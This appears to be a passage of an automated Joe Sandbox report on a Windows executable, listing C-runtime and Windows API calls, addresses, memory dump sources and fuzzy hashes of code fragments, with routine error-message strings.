                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d0318ae55f50b6dcee6d616b573d53fae0e0d17b0b79c1b3a6779b9b80778ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA11B132B1DB419AE750AB02E854339F2A0FB88BE5F854234DA1DA77A4CF3CD9548710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A6D7
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A70D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A73A
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A74B
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A75C
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACE9437D,?,?,?,?,00007FF7ACE9DCD7,?,?,00000000,00007FF7ACE9A7E6,?,?,?), ref: 00007FF7ACE9A777
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: b9ed1a4e590336ba34b9cc0adcda05e316cd19dcf21a64e85ad9e9ab5a233fdb
                                                                                                                                                                                                            • Instruction ID: 9e584828cc27954eba3c7436f5a115f7a9254a177db9df97f1ba97c328b33439
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9ed1a4e590336ba34b9cc0adcda05e316cd19dcf21a64e85ad9e9ab5a233fdb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92118E30A0E34262FA1477215646139E2925F447F0F864374F93E7B7F6EE2CE8518621
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                            • API String ID: 851805269-3733052814
                                                                                                                                                                                                            • Opcode ID: 9800ab22ff9ec3031df11c68b1b6988b1d6dca39287b35c2ac61cac3dceebb2d
                                                                                                                                                                                                            • Instruction ID: 149e98c7fb8f21e79a5be1d6a6042506824430c6e169af427ea137f6122ce8bf
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9800ab22ff9ec3031df11c68b1b6988b1d6dca39287b35c2ac61cac3dceebb2d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E61033690D6C2A6EB34AF11D640278B7A0FB44B96F854171DA6C67BE5DF3CE4A0C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                                                                            • Opcode ID: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction ID: 5fee9a97739454e2354908f6f28e05c8ea2689a6e792ba32351f65357aa05bc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ca7bf8577ec542d0e69192cc971812b89960c92109ccbd26765ab8ebdf2d4b6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F951F333A0E682A6E714EF15E500A39B395FB41B89F929171DA4F23758DF3CE841C710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                            • Opcode ID: 1c75f085d0d1285afa7d256397b39d5154ba0e32df1410c11512219579e8eefc
                                                                                                                                                                                                            • Instruction ID: 56cec77e9a2617d97f894f5298dad615abcca14ae5f44ad646a0ee4f0f976c5e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c75f085d0d1285afa7d256397b39d5154ba0e32df1410c11512219579e8eefc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35316E3260E68299EB24EB61E8551F9B360FF88784F850135EA4D5BB65DF3CD1058710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: GetLastError.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87447
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE87420: FormatMessageW.KERNEL32(00000000,00007FF7ACE826A0), ref: 00007FF7ACE87476
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF7ACE82748
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                                                                            • Opcode ID: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction ID: e6f6eee56f05c49682eca42b02838a8d575fce1fde839ec727a98d34bd44ebd7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69e3767f8cdd6c35a8cd2c47750a455f0093d4d97caca0efebb433e2d8ab7874
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D531527262EBC2A1E630AB10E4517EAB364FF84785FC14036E68D276A9DF3CD255CB50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                            • Opcode ID: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction ID: 60d9d95d3a6130d33c70eefa82176ddaa46a8fb77ca950c6324c67f5d670f9b2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b22ba27cf5ec64e3c37270bb25822a4f1a3ee3e342d89922054c394a8bf0263d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F0AF71A1F742A5EA20AB20E844339D360BF897A2FD90735D56E662F0CF2CD008C720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                            • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction ID: 6eed861bbc9385c8c604a1f76d53db9e29344388df0e9869ea69a43e9442c698
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C11B632D1DB836DF7787164D441375A8C06F553A6F8E4A31F56EAA2F6CE2CE4404120
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7AF
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7CE
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A7F6
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A807
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACE999A3,?,?,00000000,00007FF7ACE99C3E,?,?,?,?,?,00007FF7ACE9211C), ref: 00007FF7ACE9A818
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            • Opcode ID: 1866f34fa7f79f3022db2fd0a4456b1afab4f469433fcd6442c1cb9f0b531661
                                                                                                                                                                                                            • Instruction ID: cb41e2ee8a7fe4f1eb77544f7537645b50f246577fa4e5a27cd87d5f010f3c7b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1866f34fa7f79f3022db2fd0a4456b1afab4f469433fcd6442c1cb9f0b531661
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B11AF30E0E20261FA68B325564A179E2515F407F0FCA4374F93D7A7F6EE2CE9528221
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A635
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A654
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A67C
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A68D
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F), ref: 00007FF7ACE9A69E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                            • API String ID: 3215553584-1196891531
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE83BB1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7ACE97DCE
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: RtlFreeHeap.NTDLL(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D5E
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE99D48: GetLastError.KERNEL32(?,?,?,00007FF7ACEA1D72,?,?,?,00007FF7ACEA1DAF,?,?,00000000,00007FF7ACEA2275,?,?,?,00007FF7ACEA21A7), ref: 00007FF7ACE99D68
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7ACE8ADA5), ref: 00007FF7ACE97DEC
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                            • API String ID: 3580290477-886552919
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                                            • Opcode ID: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction ID: 12d15899d12f0a8a7e3900465ef0c1572254326ffc9584af98d6fe2b4252f6e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06108ee8a0dfea952a12a3b0306062f889501f0bb9d520917d4d6b2389df326d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C221B27272D782A1EB20A750F4503EAB364FB84789FC15035EA8D676A9DF3CD205CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                            • Opcode ID: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
                                                                                                                                                                                                            • Instruction ID: 8d85c9f7d9476b0639170df2c23d7d35ce3eb7369c336d506b5bdbc8223d4428
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 858846fea34555fb8d2c4f12b26bdb04a58b0d9f624c4d397e9619eb30fde2ff
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97118C3660DB8192EB219F15E500269B7A0FB88B85F9D4270EE8C17768DF3CC5618B10
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.3274812267.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274790861.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274845224.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274871087.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000000.00000002.3274915119.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                            • API String ID: 2595371189-336475711
